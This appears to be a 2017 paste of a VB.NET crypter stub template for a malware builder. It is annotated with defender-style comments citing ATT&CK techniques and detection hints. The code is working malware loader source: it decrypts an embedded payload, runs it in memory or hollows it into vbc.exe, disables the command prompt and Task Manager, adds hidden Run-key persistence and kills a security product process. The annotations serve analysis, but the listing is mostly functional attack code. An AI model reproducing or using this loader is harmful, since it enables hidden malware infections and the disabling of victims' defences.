
Untitled

a guest
Jun 27th, 2017
  1. Imports System.Windows
  2. Imports System
  3. Imports System.Net
  4. Imports System.IO
  5. Imports System.Text
  6. Imports System.Reflection
  7. Imports System.Windows.Forms
  8. Imports System.IO.FileStream
  9. Imports Microsoft.VisualBasic
  10. Imports System.Runtime.InteropServices
  11. Imports System.ComponentModel
  12. Imports Microsoft.Win32
  13. Imports System.Diagnostics
  14. Imports System.Runtime.CompilerServices
  15. Imports System.Object
  16. #VersionInfo#
  17. #fakejunk1#
  18. Module %1%
  ' Builder template: the %N% tokens are placeholders, so this listing is not valid VB until something substitutes them.
  ' %3% supplies the Base64 text of the embedded payload.
  19. Dim %2% As String = %3%
  ' The decode key is a string literal in the stub, so the payload can be recovered offline from a built sample.
  20. Dim c As New PolyXorbyMiharbiDono("EncryptionKEY")
  ' Payload decode chain, evaluated as a module-level field initialiser: Base64 -> Deflate (DeCompress) -> PolyDeCrypt.
  21. Dim %4% As Byte() = c.PolyDeCrypt(DeCompress(Convert.FromBase64String(%2%)))
  ' %5% is not referenced anywhere else in this listing.
  22. Dim %5% As String = "%6%" & ".exe"
  ' Feature switches. Sub Main acts on a switch only when it equals "T".
  ' NOTE(review): the non-placeholder literals below are presumably replaced by the builder; confirm against a built sample.
  23. Dim Auto As String = "%88%"
  24. Dim DotNet As String = "%999%"
  25. Dim startup As String="%90%"
  ' AntiT, AntiSystems and microSs are declared but never read in this listing.
  26. Dim AntiT As String = "ThisnThat"
  27. Dim AntiTaskss As String="antitask"
  28. Dim Dna As String="disablecmd"
  29. Dim AntiSystems As String="antisystem"
  30. Dim antimals As String="antimal"
  31. Dim microSs As String="microS"
  ' Environment.SystemDirectory(0) is the first character of the system directory path (the drive letter).
  ' The resulting .NET 2.0 vbc.exe path is what Sub Main hands to RunPE.Inject as the host process.
  32. Dim vbc As String=Environment.SystemDirectory(0) & ":\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  33.  
  ' Inflates a raw Deflate stream held in `input` and returns the decompressed bytes.
  ' Used by the module-level payload initialiser between the Base64 decode and PolyDeCrypt.
  34. Public Function DeCompress(ByVal input() As Byte) As Byte()
  35. Dim m As New IO.MemoryStream(input)
  36. Dim c As New IO.Compression.DeflateStream(m, IO.Compression.CompressionMode.Decompress)
  37. Dim Buffer() As Byte
  ' Offset and Count are advanced together, so both always hold the number of bytes read so far.
  38. Dim Offset As Integer = 0
  39. Dim Count As Integer = 0
  40. While True
  ' Grow the output so that at least 100 more bytes fit, then read at most 100 bytes per pass.
  41. ReDim Preserve Buffer(Count + 100)
  42. Dim Bytes As Integer = c.Read(Buffer, Offset, 100)
  ' A read of 0 bytes marks the end of the compressed stream.
  43. If Bytes = 0 Then Exit While
  44. Offset += Bytes
  45. Count += Bytes
  46. End While
  ' Trim the spare capacity so the result is exactly Count bytes long.
  47. ReDim Preserve Buffer(Count - 1)
  48. Return Buffer
  49. End Function
  50.  
  ' Entry point of the stub. Each stage runs only when its switch string equals "T".
  ' Most stages sit in Try blocks with empty Catch handlers, so failures are silent.
  ' Defender summary: policy-value tampering, Run-key persistence, in-memory assembly loading,
  ' and a process-hollowing fallback that targets vbc.exe.
  51. Sub Main()
  52. '------------------------------------------------------------------------------------------------------------------
  53. '------------------------------------------------------------------------------------------------------------------
  54. '------------------------------------------------------------------------------------------------------------------
  55. '------------------------------------------------------------------------------------------------------------------
  ' Stage: writes the per-user DisableCMD policy value (defense impairment, cf. ATT&CK T1562.001 / T1112).
  ' Detection: a registry write to HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD by a non-management process.
  56. if Dna="T" then
  57. Try
  58. My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System", "DisableCMD", "1", Microsoft.Win32.RegistryValueKind.DWord)
  59. Catch ex As Exception
  60. End Try
  61. End if
  62. '------------------------------------------------------------------------------------------------------------------
  63. '------------------------------------------------------------------------------------------------------------------
  ' Stage: sets the per-user DisableTaskMgr policy value by launching a hidden reg.exe.
  ' Detection: the reg.exe command line below, or the resulting value under ...\Policies\System.
  64. if AntiTaskss="T" then
  65. Try
  66. Shell("REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide)
  67. Catch ex As Exception
  68. End Try
  69. End if
  70.  
  71. '------------------------------------------------------------------------------------------------------------------
  72. '------------------------------------------------------------------------------------------------------------------
  ' Stage: persistence (cf. ATT&CK T1547.001, T1564.001). Copies the running executable into the
  ' ApplicationData folder under its own file name, marks the copy Hidden, then adds two HKCU Run values:
  ' one named "1" & ProductName pointing at the copy, and one named %111% pointing at the current path.
  ' Detection: a hidden executable directly in %APPDATA% referenced from HKCU\...\CurrentVersion\Run.
  73. If startup = "T" Then
  74. Try
  75. IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, _
  76. System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  77. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
  78. IO.File.SetAttributes(System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  79. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath), IO.FileAttributes.Hidden)
  80. My.Computer.Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", _
  81. True).SetValue("1" & System.Windows.Forms.Application.ProductName, _
  82. System.Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData) _
  83. & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath))
  84. addtostartup_Adminreq("%111%", Application.ExecutablePath)
  85. Catch ex As Exception
  86. End Try
  87. End if
  88. '------------------------------------------------------------------------------------------------------------------
  89. '------------------------------------------------------------------------------------------------------------------
  ' Stage: runs Exe() through a ThreadStart delegate. Invoke() calls it on the current thread; no Thread object is created.
  ' This stage has no Try block, so an exception thrown by Exe() propagates out of Main.
  90. If DotNet = "T" Then
  91. Dim thr1 As New Threading.ThreadStart(AddressOf Exe)
  92. thr1.Invoke()
  93. Else: End If
  94. '------------------------------------------------------------------------------------------------------------------
  95. '------------------------------------------------------------------------------------------------------------------
  ' Stage: calls the process-termination helper defined later in this module.
  96. If antimals = "T" Then
  97. Try
  98. AntiMalwarebytes()
  99. Catch ex As Exception
  100. End Try
  101. End if
  102. '------------------------------------------------------------------------------------------------------------------
  103. '------------------------------------------------------------------------------------------------------------------
  ' Stage: payload launch. First tries to load the decoded bytes as a managed assembly and run it in-process
  ' (reflective loading, cf. ATT&CK T1620). Any exception falls through to RunPE.Inject with vbc.exe as host.
  ' NOTE(review): the fallback presumably covers payloads that are not .NET assemblies; confirm with a sample.
  104. If Auto = "T" Then
  105. Try
  106. Assembly.Load(%4%)
  107. Dim thr As New Threading.ThreadStart(AddressOf RunExe)
  108. thr.Invoke()
  109. Catch e As Exception
  ' Both branches of this bitness check make the same call.
  110. if os.is64Bit()=True Then
  111. RunPE.Inject(%4%,vbc)
  112. Else
  113. RunPE.Inject(%4%,vbc)
  114. End If
  115. End Try
  116. Else: End If
  ' The End statement terminates the stub process immediately.
  117. End
  118. End Sub
  119. '------------------------------------------------------------------------------------------------------------------
  120. '------------------------------------------------------------------------------------------------------------------
  ' Writes a string value Name -> Path under the Run key so that Path starts at user logon.
  ' Despite the "Adminreq" in the name, the hive opened here is CurrentUser (HKCU).
  ' Any exception, including a failed OpenSubKey, is swallowed by the empty Catch.
  121. Public Sub addtostartup_Adminreq(ByVal Name As String, ByVal Path As String)
  122. Try
  123. Dim Registry As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
  ' The second argument (True) opens the key writable.
  124. Dim Key As Microsoft.Win32.RegistryKey = Registry.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
  125. Key.SetValue(Name, Path, Microsoft.Win32.RegistryValueKind.String)
  126. Catch ex As Exception
  127. End Try
  128. End Sub
  129. '------------------------------------------------------------------------------------------------------------------
  130. '------------------------------------------------------------------------------------------------------------------
  ' Enumerates every running process and calls Kill() on any whose lower-cased name equals the Case literal below.
  ' Despite the function name, the only literal tested is "Msseces".
  ' The function declares no return type and returns no value.
  ' Detection: unexpected termination of a security product's process by an unrelated user-mode program (cf. ATT&CK T1562.001).
  131. Function AntiMalwarebytes()
  132. Dim malwarebytes As Process() = Process.GetProcesses
  133. Dim i As Integer
  134. For i = 0 To malwarebytes.Length - 1
  ' The process name is lower-cased before it is compared with the Case literal.
  135. Select Case Strings.LCase(malwarebytes(i).ProcessName)
  136. Case "Msseces"
  137. malwarebytes(i).Kill()
  138. Case Else
  139. End Select
  140. Next
  141. End Function
  142. '------------------------------------------------------------------------------------------------------------------
  143. '------------------------------------------------------------------------------------------------------------------
  ' Loads the decoded payload bytes as a managed assembly from memory and invokes its entry point
  ' with the single argument "1". The payload is never written to disk by this routine, so file-based
  ' scanning does not see it; in-memory assembly-load telemetry does.
  144. Public Sub RunExe()
  ' Resource is assigned but never used.
  145. Dim Resource As String = String.Empty
  146. Dim ResourcesBuffer As Byte() = %4%
  147. Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
  148. Dim entryPoint As MethodInfo = [assembly].EntryPoint
  ' CreateInstance is given the entry point's method name; its result is passed as the invocation target.
  149. Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
  150. entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}})
  151. End Sub
  ' Same in-memory load-and-invoke sequence as RunExe; the only difference is the argument "2".
  ' Sub Main calls this when the DotNet switch equals "T".
  152. Public Sub Exe()
  ' Resource is assigned but never used.
  153. Dim Resource As String = String.Empty
  154. Dim ResourcesBuffer As Byte() = %4%
  155. Dim assembly As Assembly = assembly.Load(ResourcesBuffer)
  156. Dim entryPoint As MethodInfo = [assembly].EntryPoint
  ' CreateInstance is given the entry point's method name; its result is passed as the invocation target.
  157. Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name))
  158. entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"2"}})
  159. End Sub
  160. '------------------------------------------------------------------------------------------------------------------
  161. '------------------------------------------------------------------------------------------------------------------
  ' Helper holding one OS-bitness probe.
  162. public Class os
  163. 'Reports whether the OS looks 64-bit, judged only by an environment variable.
  ' Returns True when the ProgramW6432 environment variable is non-empty, otherwise False.
  ' The variable is read from the process environment, so the answer reflects whatever that environment contains.
  164. Public Shared Function is64Bit() As Boolean
  165. If Not System.Environment.GetEnvironmentVariable("ProgramW6432") = "" Then
  166. Return True
  167. Else
  168. Return False
  169. End If
  170. End Function
  171. End Class
  172. '------------------------------------------------------------------------------------------------------------------
  173. '------------------------------------------------------------------------------------------------------------------
  ' RunPE: process-hollowing helper (MITRE ATT&CK T1055.012). Inject starts `target` suspended and replaces
  ' its image with the PE held in `data`. Addresses are handled as 32-bit integers and the thread context
  ' uses x86 register names, so the code is written for 32-bit processes.
  ' Telemetry to hunt for: a child created suspended, followed by cross-process unmap / allocate / write /
  ' set-thread-context activity from the parent before the child's first resume.
  174. Public Class RunPE
  ' Page-protection constants. None of these names is referenced below; Inject passes numeric literals.
  175. Public Const PAGE_NOCACHE As Long = &H200
  176. Public Const PAGE_EXECUTE_READWRITE As Long = &H40
  177. Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
  178. Public Const PAGE_EXECUTE_READ As Long = &H20
  179. Public Const PAGE_EXECUTE As Long = &H10
  180. Public Const PAGE_WRITECOPY As Long = &H8
  181. Public Const PAGE_NOACCESS As Long = &H1
  182. Public Const PAGE_READWRITE As Long = &H4
  183. Public Const PAGE_READONLY As UInt32 = &H2
  184.  
  ' data:   raw bytes of the PE image to run.
  ' target: path of the executable to start suspended and use as host (the caller passes the vbc.exe path).
  ' Returns nothing; on a failed CreateProcess or a header-signature mismatch it returns early without reporting.
  185. Public Shared Sub Inject(ByVal data() As Byte, ByVal target As String)
  186. Dim C = New Context, SH As Section_Header, PI = New Process_Information, SI = New Startup_Information, PS = New Security_Flags, TS = New Security_Flags
  ' Pin the payload array to obtain its address, read the DOS header through it, then release the pin.
  187. Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
  188. Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
  189. Dim DH As New DOS_Header
  190. DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
  191. GC.Free()
  ' The Win32/NT functions are resolved by name at run time via CreateAPI (LoadLibraryA + GetProcAddress).
  ' The function names remain as plain string literals, which makes them usable for static signatures.
  192. Dim CP As CP = CreateAPI(Of CP)("kernel32", "CreateProcessA")
  193. Dim GTC As GTC = CreateAPI(Of GTC)("kernel32", "GetThreadContext")
  194. Dim RPM As RPM = CreateAPI(Of RPM)("kernel32", "ReadProcessMemory")
  195. Dim WPM As WPM = CreateAPI(Of WPM)("kernel32", "WriteProcessMemory")
  196. Dim UVS As UVS = CreateAPI(Of UVS)("ntdll", "ZwUnmapViewOfSection")
  197. Dim VA As VA = CreateAPI(Of VA)("kernel32", "VirtualAllocEx")
  198. Dim STC As STC = CreateAPI(Of STC)("kernel32", "SetThreadContext")
  199. Dim RT As RT = CreateAPI(Of RT)("kernel32", "ResumeThread")
  ' Creation flag 4 is CREATE_SUSPENDED. CP is called here and again a few lines below; each successful
  ' call creates a suspended child, and only the handles from the later call are used afterwards.
  200. If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  ' Read the NT headers at the file offset stored in the DOS header's last field.
  201. Dim NH As New NT_Headers
  202. NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
  203. Dim Address, Offset As Long, ret As UInteger
  204. SI.CB = Len(SI)
  ' 65539 = &H10003, i.e. the x86 CONTEXT_CONTROL and CONTEXT_INTEGER flag bits.
  205. C.Flags = 65539
  ' 17744 = &H4550 ("PE") and 23117 = &H5A4D ("MZ"): reject data that does not carry both signatures.
  206. If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
  207. If CP(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
  ' Fetch the suspended thread's registers, read 4 bytes at Ebx + 8 in the child into Address
  ' (on x86 this is where the initial thread's PEB keeps the image base), then unmap the view at that address.
  208. GTC(PI.Thread, C)
  209. RPM(PI.Process, C.Ebx + 8, Address, 4, 0)
  210. UVS(PI.Process, Address)
  ' Allocate SImage bytes in the child at the payload's Image address. 12288 = &H3000 (MEM_COMMIT Or MEM_RESERVE);
  ' the protection argument 4 has the same value as PAGE_READWRITE above.
  211. Dim ImageBase As UInt32 = VA(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
  212. If ImageBase <> 0 Then
  ' Copy the PE headers, then each section's raw data to ImageBase + its Address field.
  213. WPM(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
  ' 248 is the size of the 32-bit NT headers; the section table follows, 40 bytes per entry.
  214. Offset = DH.Address + 248
  215. For I As Integer = 0 To NH.File.Sections - 1
  216. SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
  217. Dim Raw(SH.Size) As Byte
  218. For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
  219. WPM(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
  220. Next I
  ' Write the new image base back to Ebx + 8 in the child, set Eax to image base + the optional header's
  ' Address field (the entry point), apply the context and resume the thread.
  221. Dim T = BitConverter.GetBytes(ImageBase)
  222. WPM(PI.Process, C.Ebx + 8, T, 4, ret)
  223. C.Eax = ImageBase + NH.Optional.Address
  224. STC(PI.Thread, C)
  225. RT(PI.Thread)
  226. End If
  227. End Sub
  ' The only two statically declared imports; every other API is looked up through them.
  228. Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
  229. Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
  ' Resolves export `method` of library `name` and wraps the function pointer in a delegate of type T.
  ' Neither the library handle nor the export address is checked before use.
  230. Private Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
  231. Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
  232. End Function
  ' Thread context passed to GetThreadContext / SetThreadContext. StructLayout(0) is LayoutKind.Sequential.
  ' NOTE(review): the field order appears to mirror the 32-bit Windows CONTEXT structure; confirm against the SDK header.
  233. <StructLayout(0)> Structure Context
  234. Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
  235. Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
  236. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
  237. End Structure
  ' Save area embedded in Context; presumably the floating-point state (TODO confirm).
  238. <StructLayout(0)> Structure Save
  239. Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
  240. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
  241. Dim State As UInt32
  242. End Structure
  ' Address/size pair used inside Section_Header.
  243. Structure Misc
  244. Dim Address, Size As UInt32
  245. End Structure
  ' One section-table entry. Inject reads Address (destination offset), Size (byte count) and Pointer (offset in data).
  246. Structure Section_Header
  247. Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
  248. End Structure
  ' Output of the CP call: process and thread handles plus their ids.
  249. Structure Process_Information
  250. Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
  251. End Structure
  ' Startup information passed by reference to the CP call.
  252. <StructLayout(0, CharSet:=3)> Structure Startup_Information
  253. Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
  254. Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
  255. End Structure
  ' Process/thread security attributes passed by reference to the CP call; left at default values by Inject.
  256. <StructLayout(0)> Structure Security_Flags
  257. Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
  258. End Structure
  ' DOS header of the payload. Inject checks Magic and uses Address as the offset of the NT headers.
  259. <StructLayout(0)> Structure DOS_Header
  260. Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
  261. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
  262. Dim ID, Info As UInt16
  263. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
  264. Dim Address As Int32
  265. End Structure
  ' NT headers: signature, file header and optional header.
  266. Structure NT_Headers
  267. Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
  268. End Structure
  ' File header. Inject uses Sections as the number of section-table entries to copy.
  269. <StructLayout(0)> Structure File_Header
  270. Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
  271. End Structure
  ' Optional header. Inject uses Address (entry point), Image (allocation address), SImage (allocation size) and SHeaders (header byte count).
  272. <StructLayout(0)> Structure Optional_Headers
  273. Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
  274. Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
  275. Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
  276. <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
  277. End Structure
  ' One data-directory entry; not read by Inject.
  278. <StructLayout(0)> Structure Data_Directory
  279. Dim Address, Size As UInt32
  280. End Structure
  ' Delegate signatures for the APIs that Inject resolves at run time:
  ' CP = CreateProcessA, WPM = WriteProcessMemory, RPM = ReadProcessMemory, VA = VirtualAllocEx,
  ' UVS = ZwUnmapViewOfSection, RT = ResumeThread, GTC = GetThreadContext, STC = SetThreadContext.
  281. Delegate Function CP(ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
  282. Delegate Function WPM(ByVal process As IntPtr, ByVal address As Integer, ByVal buffer As Byte(), ByVal size As Integer, <Out()> ByRef written As Integer) As Boolean
  283. Delegate Function RPM(ByVal process As IntPtr, ByVal address As Integer, ByRef buffer As Integer, ByVal size As Integer, ByRef read As Integer) As Integer
  284. Delegate Function VA(ByVal process As IntPtr, ByVal address As Integer, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
  285. Delegate Function UVS(ByVal process As IntPtr, ByVal address As Integer) As Long
  286. Delegate Function RT(ByVal thread As IntPtr) As UInt32
  287. Delegate Function GTC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
  288. Delegate Function STC(ByVal thread As IntPtr, ByRef context As Context) As Boolean
  289. End Class
  290. '------------------------------------------------------------------------------------------------------------------
  291. '------------------------------------------------------------------------------------------------------------------
  ' Payload de-obfuscation: a key-driven XOR pass followed by removal of a running byte-difference chain.
  ' Only the decode direction is present in this listing. The key is the string given to the constructor,
  ' and the stub passes a literal, so the transform is reversible by anyone holding the sample.
  ' It is obfuscation against static scanning rather than confidentiality.
  292. Public Class PolyXorbyMiharbiDono
  ' Decodes Data and returns a buffer one byte shorter than the input. Data is modified in place by XorCrypt.
  293. Public Function PolyDeCrypt(ByVal Data() As Byte) As Byte()
  294. 'This function is the exact reverse of the crypt function (which is not part of this listing).
  295. 'Undo the XOR layer first to get back the chained data.
  296. Data = XorCrypt(Data, Encoding.Default.GetBytes(Key))
  297. Dim i As Integer
  298. 'The crypt function returns an array one byte longer than its input; drop that extra byte here.
  299. Dim ReturnBuffer(Data.Length - 2) As Byte
  300. 'Encoding ran from byte 0 to the last one, so decoding walks from the last byte back to index 1.
  301. For i = Data.Length - 1 To 1 Step -1
  302. 'Subtract the previous byte from the current one, modulo 256.
  303. ReturnBuffer(i - 1) = ModuloByte(Data(i), -Data(i - 1))
  304. Next
  305. 'The buffer is one byte shorter than Data, as intended. Return it.
  306. Return ReturnBuffer
  307. End Function
  308. 'Adds Addition to MyByte modulo 256. A negative Addition is first raised by 256 until it is non-negative, so the result is always in 0..255.
  309. Private Function ModuloByte(ByVal MyByte As Byte, ByVal Addition As Int16) As Byte
  310. While Addition < 0
  311. Addition += 256
  312. End While
  313. Return Convert.ToByte((MyByte + Addition) Mod 256)
  314. End Function
  ' XORs every byte of Data, in place, with two values derived from Key and the byte's index.
  ' An empty key leaves Data unchanged. Returns the same array it was given.
  315. Private Function XorCrypt(ByVal Data() As Byte, ByVal Key() As Byte) As Byte()
  316. If Key.Length <> 0 Then
  317. Dim i As Integer
  318. For i = 0 To Data.Length - 1
  ' First term: ModuloByte of the key byte at i Mod Key.Length and a second key byte selected by that byte's value.
  ' Second term: the key byte at (i + (i Mod 7)) Mod Key.Length.
  319. Data(i) = Data(i) Xor ModuloByte(Key(i Mod Key.Length), [Key](Key(i Mod Key.Length) Mod Key.Length)) Xor [Key](((i + (i Mod 7)) Mod Key.Length) Mod Key.Length)
  320. Next
  321. End If
  322. Return Data
  323. End Function
  ' Backing field for the Key property.
  324. Private sKey As String = ""
  325. 'Property that gives access to the key.
  326. Public Property Key() As String
  327. Get
  328. Return sKey
  329. End Get
  330. Set(ByVal value As String)
  331. sKey = value
  332. End Set
  333. End Property
  334. 'Initialization: constructor that takes the key string.
  335. Public Sub New(ByVal Key As String)
  336. Me.Key = Key
  337. End Sub
  ' Parameterless constructor: the key is the empty string, which makes XorCrypt a no-op.
  338. Public Sub New()
  339. Me.Key = ""
  340. End Sub
  341. End Class
  342. '------------------------------------------------------------------------------------------------------------------
  343. '------------------------------------------------------------------------------------------------------------------
  344. End Module
  345. #fakejunk2#